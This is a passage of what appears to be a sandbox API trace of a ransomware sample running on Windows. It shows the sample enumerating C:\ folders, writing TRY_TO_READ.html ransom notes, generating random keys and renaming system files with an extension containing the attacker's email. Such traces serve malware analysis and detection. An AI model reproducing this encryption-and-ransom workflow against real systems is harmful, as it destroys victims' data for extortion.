RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df90 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df68 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317b48 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317b48 | out: hHeap=0x2e0000) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df68 | out: hHeap=0x2e0000) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df90 | out: hHeap=0x2e0000) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445e0 | out: hHeap=0x2e0000) returned 1 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445e0 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df90 [0116.391] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.391] GetLastError () returned 0x0 [0116.391] SetLastError (dwErrCode=0x0) [0116.391] GetLastError () returned 0x0 [0116.391] SetLastError (dwErrCode=0x0) [0116.391] GetLastError () returned 0x0 [0116.391] SetLastError (dwErrCode=0x0) [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344650 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344650 | out: hHeap=0x2e0000) returned 1 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344650 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344650 | out: hHeap=0x2e0000) returned 1 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344650 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df68 [0116.392] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.392] GetLastError () returned 0x0 [0116.392] SetLastError (dwErrCode=0x0) [0116.392] GetLastError () returned 0x0 [0116.392] SetLastError (dwErrCode=0x0) [0116.392] GetLastError () returned 0x0 [0116.392] SetLastError (dwErrCode=0x0) [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfe0 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfe0 | out: hHeap=0x2e0000) returned 1 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfe0 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317b48 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317b48 | out: hHeap=0x2e0000) returned 1 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e030 [0116.392] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e030 | out: hHeap=0x2e0000) returned 1 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfe0 | out: hHeap=0x2e0000) returned 1 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.393] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.393] GetLastError () returned 0x0 [0116.393] SetLastError (dwErrCode=0x0) [0116.393] GetLastError () returned 0x0 [0116.393] SetLastError (dwErrCode=0x0) [0116.393] GetLastError () returned 0x0 [0116.393] SetLastError (dwErrCode=0x0) [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfe0 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfe0 | out: hHeap=0x2e0000) returned 1 [0116.393] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dfb8 | out: hHeap=0x2e0000) returned 1 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfb8 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dfe0 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.393] GetLastError () returned 0x0 [0116.393] SetLastError (dwErrCode=0x0) [0116.393] GetLastError () returned 0x0 [0116.393] SetLastError (dwErrCode=0x0) [0116.393] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.393] CreateFileW (lpFileName="C:\\\\Recovery\\TRY_TO_READ.html" (normalized: "c:\\recovery\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.395] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.396] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.396] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.396] CloseHandle (hObject=0x3d0) returned 1 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.396] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x90157c30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x90157c30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.396] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.396] GetLastError () returned 0x0 [0116.396] SetLastError (dwErrCode=0x0) [0116.396] GetLastError () returned 0x0 [0116.396] SetLastError (dwErrCode=0x0) [0116.396] GetLastError () returned 0x0 [0116.396] SetLastError (dwErrCode=0x0) [0116.396] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.396] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.396] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.397] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.397] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.397] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.397] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.397] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.400] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.400] GetLastError () returned 0x0 [0116.400] SetLastError (dwErrCode=0x0) [0116.400] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.400] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.400] GetLastError () returned 0x0 [0116.400] SetLastError (dwErrCode=0x0) [0116.400] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.400] CreateFileW (lpFileName="C:\\\\System Volume Information\\TRY_TO_READ.html" (normalized: "c:\\system volume information\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.401] CloseHandle (hObject=0xffffffff) returned 0 [0116.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.401] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0116.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.401] GetLastError () returned 0x6 [0116.401] SetLastError (dwErrCode=0x6) [0116.401] GetLastError () returned 0x6 [0116.401] SetLastError (dwErrCode=0x6) [0116.401] GetLastError () returned 0x6 [0116.401] SetLastError (dwErrCode=0x6) [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e030 [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e058 [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e080 [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.401] GetLastError () returned 0x6 [0116.401] SetLastError (dwErrCode=0x6) [0116.401] GetLastError () returned 0x6 [0116.402] SetLastError (dwErrCode=0x6) [0116.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.402] CreateFileW (lpFileName="C:\\\\Users\\TRY_TO_READ.html" (normalized: "c:\\users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.402] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.403] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.403] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.403] CloseHandle (hObject=0x3d0) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e080 | out: hHeap=0x2e0000) returned 1 [0116.404] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8ef0b310, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x8ef0b310, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.404] GetLastError () returned 0xb7 [0116.404] SetLastError (dwErrCode=0xb7) [0116.404] GetLastError () returned 0xb7 [0116.404] SetLastError (dwErrCode=0xb7) [0116.404] GetLastError () returned 0xb7 [0116.404] SetLastError (dwErrCode=0xb7) [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e080 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317b48 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317b48 | out: hHeap=0x2e0000) returned 1 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e080 | out: hHeap=0x2e0000) returned 1 [0116.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.404] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8ef0b310, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x8ef0b310, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x33d5f0 [0116.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.404] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x33d5f0 | out: pbBuffer=0x33d5f0) returned 1 [0116.405] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x3309f8 | out: pbBuffer=0x3309f8) returned 1 [0116.405] SetFileAttributesW (lpFileName="C:\\\\pagefile.sys", dwFileAttributes=0x80) returned 0 [0116.405] lstrlenW (lpString="C:\\\\pagefile.sys") returned 16 [0116.405] GetProcessHeap () returned 0x2e0000 [0116.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x86) returned 0x312a78 [0116.405] lstrcpyW (in: lpString1=0x312a78, lpString2="C:\\\\pagefile.sys" | out: lpString1="C:\\\\pagefile.sys") returned="C:\\\\pagefile.sys" [0116.405] lstrcatW (in: lpString1="C:\\\\pagefile.sys", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR" [0116.405] MoveFileExW (lpExistingFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.405] CreateFileW (lpFileName="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.405] GetProcessHeap () returned 0x2e0000 [0116.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x312a78 | out: hHeap=0x2e0000) returned 1 [0116.406] CloseHandle (hObject=0xffffffff) returned 0 [0116.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x30e3a8 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.406] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x30e3a8 | out: pbBuffer=0x30e3a8) returned 1 [0116.406] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a18 | out: pbBuffer=0x330a18) returned 1 [0116.406] SetFileAttributesW (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0x80) returned 0 [0116.406] lstrlenW (lpString="C:\\\\hiberfil.sys") returned 16 [0116.406] GetProcessHeap () returned 0x2e0000 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x86) returned 0x30e4b0 [0116.406] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\hiberfil.sys" | out: lpString1="C:\\\\hiberfil.sys") returned="C:\\\\hiberfil.sys" [0116.406] lstrcatW (in: lpString1="C:\\\\hiberfil.sys", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR" [0116.406] MoveFileExW (lpExistingFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.406] CreateFileW (lpFileName="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.406] GetProcessHeap () returned 0x2e0000 [0116.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.406] CloseHandle (hObject=0xffffffff) returned 0 [0116.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x344b98 [0116.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330998 [0116.406] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x344b98 | out: pbBuffer=0x344b98) returned 1 [0116.406] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330998 | out: pbBuffer=0x330998) returned 1 [0116.406] SetFileAttributesW (lpFileName="C:\\\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 1 [0116.407] lstrlenW (lpString="C:\\\\BOOTSECT.BAK") returned 16 [0116.407] GetProcessHeap () returned 0x2e0000 [0116.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x86) returned 0x30e4b0 [0116.408] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\BOOTSECT.BAK" | out: lpString1="C:\\\\BOOTSECT.BAK") returned="C:\\\\BOOTSECT.BAK" [0116.408] lstrcatW (in: lpString1="C:\\\\BOOTSECT.BAK", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR") 